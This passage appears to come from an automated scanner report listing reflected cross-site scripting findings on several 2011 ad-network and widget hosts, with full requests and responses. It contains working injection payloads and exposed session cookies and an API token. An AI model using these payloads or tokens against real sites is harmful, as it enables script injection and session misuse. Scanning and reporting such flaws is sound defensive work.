Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 12:40:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 12:40:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 09 Apr 2011 12:40:46 GMT
Content-Length: 1196

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=exSuR-F6DEB7FK5H4XoMQAAAAMDMzARAKVyPwvU
...[SNIP]...
19%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..c4f34'-alert(1)-'106a47e4832&referrer=http://www.wcax.com/Global/category.asp">
...[SNIP]...

1.82. http://ib.adnxs.com/ab [referrer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25e56'-alert(1)-'8288101d5af was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=KFyPwvUoDkApXI_C9SgOQAAAAMDMzARAKVyPwvUoDkApXI_C9SgOQMhZn8QGScMa8f5MdWfsOnidU6BNAAAAAEchAAC1AAAANQEAAAIAAADbfgQA0WMAAAEAAABVU0QAVVNEACwB-gAwC1UA4gUBAgUCAAQAAAAATSLwCgAAAAA.&tt_code=vert-16&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..&referrer=http://www.wcax.com/Global/category.asp25e56'-alert(1)-'8288101d5af&pp=TaBTnQAErxsK5XIEsatUZyS2vMMbWLuZP7exLA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6bkQnVOgTZveEoTklQfnqK2NC-_675oCp439xBqP_I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBL2h0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL2NhdGVnb3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370791&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352790373&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352791028&frm=0&adk=2815960337&ga_vid=1677852705.1302352791&ga_sid=1302352791&ga_hid=1970402529&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=812&xpc=EGUpOMD3fC&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+MKcwNVSg=5pzOC9sG0dNO`q1.s%0ZSmbwg(RhLciH$_wXF3XdwLK.u3aCLlp@j>1hAYNN5fRn-rmn+)s$jI#-<oCZH-<fW]>8dl2O`L>m-GjsWE)wQW!g/$iN0C/R-zRMG(@QX[6sAVV2f_>.x0w4>`Ot/^cC@>9QVM'Y@6U@1+N3(; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 12:40:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 12:40:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 09 Apr 2011 12:40:50 GMT
Content-Length: 1196

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=exSuR-F6DEB7FK5H4XoMQAAAAMDMzARAKVyPwvU
...[SNIP]...
62113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..&referrer=http://www.wcax.com/Global/category.asp25e56'-alert(1)-'8288101d5af">
...[SNIP]...

1.83. http://ib.adnxs.com/ab [tt_code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the tt_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f02d'-alert(1)-'ada50828606 was submitted in the tt_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=KFyPwvUoDkApXI_C9SgOQAAAAMDMzARAKVyPwvUoDkApXI_C9SgOQMhZn8QGScMa8f5MdWfsOnidU6BNAAAAAEchAAC1AAAANQEAAAIAAADbfgQA0WMAAAEAAABVU0QAVVNEACwB-gAwC1UA4gUBAgUCAAQAAAAATSLwCgAAAAA.&tt_code=vert-165f02d'-alert(1)-'ada50828606&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..&referrer=http://www.wcax.com/Global/category.asp&pp=TaBTnQAErxsK5XIEsatUZyS2vMMbWLuZP7exLA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6bkQnVOgTZveEoTklQfnqK2NC-_675oCp439xBqP_I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBL2h0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL2NhdGVnb3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370791&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352790373&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352791028&frm=0&adk=2815960337&ga_vid=1677852705.1302352791&ga_sid=1302352791&ga_hid=1970402529&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=812&xpc=EGUpOMD3fC&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+MKcwNVSg=5pzOC9sG0dNO`q1.s%0ZSmbwg(RhLciH$_wXF3XdwLK.u3aCLlp@j>1hAYNN5fRn-rmn+)s$jI#-<oCZH-<fW]>8dl2O`L>m-GjsWE)wQW!g/$iN0C/R-zRMG(@QX[6sAVV2f_>.x0w4>`Ot/^cC@>9QVM'Y@6U@1+N3(; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 12:40:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 12:40:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 09 Apr 2011 12:40:33 GMT
Content-Length: 1196

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=exSuR-F6DEB7FK5H4XoMQAAAAMDMzARAKVyPwvU
...[SNIP]...
3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D&tt_code=vert-165f02d'-alert(1)-'ada50828606&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%
...[SNIP]...

1.84. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ba50'%3balert(1)//c512c095fc5 was submitted in the redir parameter. This input was echoed as 4ba50';alert(1)//c512c095fc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.foxnews&size=300x250&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.foxnews%2Ftier2_031010%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D1302538878%3F4ba50'%3balert(1)//c512c095fc5 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIiXoQChgBIAEoATCf1YztBBCf1YztBBgA; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb171130=5_[r^208WM6[kCcE/qX3lJExr?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP3vuRz0wYHU38f5MdWfsOnifKqNNAAAAAMY5AwA3AQAAfAAAABkAAACfsAMAoVsAAAEAAABVU0QAVVNEACwB-gCqAQAAzwgBAgUCAAUAAAAAQyTfEQAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198711%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12090145724922326,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5778,%5C%22spendCreativeId%5C%22:198711,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd168.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12090145724922326%5EMEDIA6_DATA%5Efoo=bar; path=/; expires=Tue, 12-Apr-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=0r(J`qtK'J; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 16:21:51 GMT
Content-Length: 521

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010;net=cm;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;ord=1302538878?4ba50';alert(1)//c512c095fc5">
...[SNIP]...

1.85. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 220c2<script>alert(1)</script>abfd15efa4b was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=E05511220c2<script>alert(1)</script>abfd15efa4b HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 09 Apr 2011 12:29:31 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 10 Apr 2011 12:29:31 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:29:30 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "E05511220C2<SCRIPT>ALERT(1)</SCRIPT>ABFD15EFA4B" was not recognized.
*/

1.86. http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.foxnews/tier2_031010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 346c9'-alert(1)-'a49eed7e1c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.foxnews346c9'-alert(1)-'a49eed7e1c6/tier2_031010;sz=300x250;net=cm;ord=1302538878;env=ifr;ord1=280882;cmpgurl=? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:23 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 16:21:23 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 16:21:23 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 18-Apr-2011 16:21:23 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 00:21:23 GMT
Content-Length: 8003

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-40452658_1302538883","http://ib.adnxs.com/ptj?member=311&inv_code=cm.foxnews346c9'-alert(1)-'a49eed7e1c6&size=300x250&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.foxnews346c9%27-alert%281%29-%27a49eed7e1c6%2Ftier2_031010%3Bnet%3Dcm%3Bu%3D%2Ccm-40452658_1302538883%2C11f3c48b4c0582b%2Cnone%2
...[SNIP]...

1.87. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Issue detail

The value of the vid request parameter is copied into the HTML document as plain text between tags. The payload 43832<img%20src%3da%20onerror%3dalert(1)>ac56b1b71cd was submitted in the vid parameter. This input was echoed as 43832<img src=a onerror=alert(1)>ac56b1b71cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /webrecorder/g/chimera.js?vid=null43832<img%20src%3da%20onerror%3dalert(1)>ac56b1b71cd HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://www.ingeniux.com/solutions/website_optimization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE="null43832<img src=a onerror=alert(1)>ac56b1b71cd"; Expires=Sun, 08-Apr-2012 00:18:53 GMT
Content-Length: 63
Date: Sat, 09 Apr 2011 00:18:53 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='null43832<img src=a onerror=alert(1)>ac56b1b71cd';


1.88. http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload ac8c2<script>alert(1)</script>525de77e7b5 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?load=data&apiToken=291A707AAEE04CCC9A00B3B498001025&buzzId=216931&_dsrId=ngbuzz_216931_dataac8c2<script>alert(1)</script>525de77e7b5 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Sat, 09 Apr 2011 12:09:30 GMT
ETag: 634379261703808200
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: public, max-age=300
Date: Sat, 09 Apr 2011 12:33:18 GMT
Connection: close
Content-Length: 1491

window.ng_scriptload({id:'ngbuzz_216931_dataac8c2<script>alert(1)</script>525de77e7b5',status:200,statusText:'200 OK',response:{Data:[{Description:'A Vermont legislative committee has give preliminary approval to a survey that establishes once and for all -- they think -- where St. Geo
...[SNIP]...

1.89. http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload c96c0<script>alert(1)</script>33816bc20bf was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?buzzId=216931c96c0<script>alert(1)</script>33816bc20bf&apiToken=291A707AAEE04CCC9A00B3B498001025 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Content-Type: text/javascript; charset=utf-8
Cache-Control: private, max-age=600
Date: Sat, 09 Apr 2011 12:29:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 102

//An error occurred: Could not find Buzz item with id: 216931c96c0<script>alert(1)</script>33816bc20bf

1.90. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7d35%3balert(1)//9227b469b76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7d35;alert(1)//9227b469b76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NGBuzz/buzz.ashx?buzzId=216931&apiToken=291A707AAEE04CCC9A00B3B498001025&e7d35%3balert(1)//9227b469b76=1 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Mon, 31 Jan 2011 21:21:01 GMT
ETag: 634320804615863350
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: public, max-age=600
Date: Sat, 09 Apr 2011 12:29:46 GMT
Connection: close
Content-Length: 11239

try{var buzzTemplate_216931="{if LoadScript(NGBaseUrl+\"HOST/\"+OrgCode+\"/js/jquery.min.js\", \"window.jQuery != null\") }\n{if location.hostname==\"hosted.newsgator.com\"}\n{eval}\n LoadCSS(\"http:
...[SNIP]...
